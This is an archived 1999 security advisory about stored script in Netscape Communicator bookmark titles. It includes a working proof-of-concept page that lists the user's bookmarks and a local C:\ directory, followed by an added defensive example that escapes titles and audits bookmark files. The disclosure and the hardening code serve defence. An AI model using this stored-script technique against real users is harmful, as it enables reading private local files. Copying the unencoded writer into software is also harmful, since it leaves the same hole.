
netscape.bookmarks.title.js.txt

17 Aug 1999 · Reported by Georgi Guninski · Type: packetstorm · Source: packetstormsecurity.com

Security vulnerability in Netscape Communicator allows JavaScript execution via bookmarks.

Code
`Date: Sun, 16 May 1999 17:17:34 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Netscape Communicator bookmarks <TITLE> security vulnerability  
  
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux  
(guess all 4.x versions are affected) in the way they handle special  
bookmarks with JavaScript code in the title.  
  
If you enclose JavaScript code with <SCRIPT> tags in the <TITLE>  
tag and bookmark that page, the JavaScript code is written in the local  
bookmarks file.  
Then when the bookmarks file is opened, the JavaScript code is executed in  
the security context of a local file - the bookmarks file.  
The bookmarks file may be opened by a script, probably a server redirect  
or by the user.  
The bookmarks file name must be known, but it is easily guessed for most  
dialup users.  
  
Vulnerabilities: reading user's bookmarks, browsing local directories,  
reading local files (works fine on Linux, probably possible on Windows).  
  
Workaround: Disable JavaScript or do not bookmark untrusted pages.  
  
Demonstration is available at: http://www.nat.bg/~joro/book2.html  
See attached file for the source.  
  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
  
--------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/book2.html>  
  
<HTML><HEAD>  
<TITLE>  
<SCRIPT>  
alert('Bookmarks got control');  
  
  
s='Here are some bookmarks: \n';  
for(i=1;i<7;i++)  
s += document.links[i]+'\n';  
alert(s);  
  
dirToRead='wysiwyg://2/file://c:/';  
a=window.open(dirToRead);  
s='Here are some files in C:\\ :\n';  
for(i=1;i<7;i++)  
s += a.document.links[i]+'\n';  
a.close();  
alert(s);  
  
  
  
</SCRIPT>  
</TITLE></HEAD>  
<BODY>  
  
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks  
with Javascript code in the title.  
<br>If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE>  
tag and bookmark that page, the JavaScript code is written in the local bookmarks file.  
Then when the bookmarks file is open, the JavaScript  
code is executed in the security context of a local file. The bookmarks  
file may be open by a script, probably a server redirect or by the user.  
The bookmarks file name must be known - easily guessed for most dialup  
users.  
<p>Vulnerability: reading user's bookmarks, browsing local directories,  
reading local files (works fine on Linux, probably possible on Windows).  
<br>  
Workaround: Disable JavaScript or do not bookmark untrusted pages.  
<br>  
<hr WIDTH="100%">  
<br>To test it:  
<br>1) Bookmark this page.  
<br>2) Close all NC windows and restart NC.  
<br>3) Open bookmarks file (change the filename in the field below if needed  
and click "Open bookmarks", or use File| Open Page... )  
<br>  
<hr WIDTH="100%">  
  
<FORM>  
Enter the file name of your bookmarks file:  
<INPUT TYPE=TEXT SIZE=70 VALUE='c:\Program Files\Netscape\Users\default\bookmark.htm'>  
</FORM>  
  
<SCRIPT>  
function openBookmarks() {  
  
/* bmFile='c:\\Program Files\\Netscape\\Users\\default\\bookmark.htm'; */  
a=window.open('wysiwyg://1/file:///'+document.forms[0].elements[0].value);  
}  
</SCRIPT>  
  
<A HREF="javascript:openBookmarks()">Open bookmarks</A>  
</BODY>  
<hr WIDTH="100%">  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
</HTML>  
`
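
The root cause described in the advisory is that the page title reaches the local bookmarks file without HTML encoding. The following is an added example, not code from the advisory or from Netscape: it contrasts a verbatim bookmark writer with one that encodes the title, and audits an existing bookmarks file for raw markup in entry text. The one-line `<DT><A HREF=...>` entry format is a simplified assumption, and all function names, the URL and the sample title are constructed.

```javascript
// Added example, not Netscape's code. Simplified bookmark line: <DT><A HREF="url">title</A>.
// All function names and the sample title below are constructed for illustration.
const SAMPLE_TITLE = "News <SCRIPT>alert('Bookmarks got control')</SCRIPT>";

// Encode the characters that can change HTML structure.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Behaviour the advisory describes: the page title is copied verbatim.
function bookmarkEntryUnsafe(title, url) {
  return `<DT><A HREF="${url}">${title}</A>`;
}

// Hardened writer: encode title and URL, store only expected URL schemes.
function bookmarkEntrySafe(title, url) {
  if (!/^(https?|ftp):\/\//i.test(url)) {
    throw new Error('unexpected URL scheme in bookmark');
  }
  return `<DT><A HREF="${escapeHtml(url)}">${escapeHtml(title)}</A>`;
}

// Audit an existing bookmarks file: report anchors whose text contains raw markup.
// Matches across line breaks because a title may span several lines.
function findSuspiciousEntries(bookmarksHtml) {
  const hits = [];
  for (const m of bookmarksHtml.matchAll(/<A\b[^>]*>([\s\S]*?)<\/A>/gi)) {
    if (/<\s*\/?\s*[a-z!]/i.test(m[1])) {
      const line = bookmarksHtml.slice(0, m.index).split('\n').length;
      hits.push({ line, text: m[1] });
    }
  }
  return hits;
}

// Constructed sample files built from the two writers.
const header = '<!DOCTYPE NETSCAPE-Bookmark-file-1>\n<DL><p>\n';
const unsafeFile = header + bookmarkEntryUnsafe(SAMPLE_TITLE, 'http://example.test/') + '\n</DL>';
const safeFile = header + bookmarkEntrySafe(SAMPLE_TITLE, 'http://example.test/') + '\n</DL>';
console.log(findSuspiciousEntries(unsafeFile)); // one hit, on line 3
console.log(findSuspiciousEntries(safeFile));   // no hits
```

The audit function can be run over a copy of an existing bookmarks file to find entries that were stored before the writer encoded titles.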
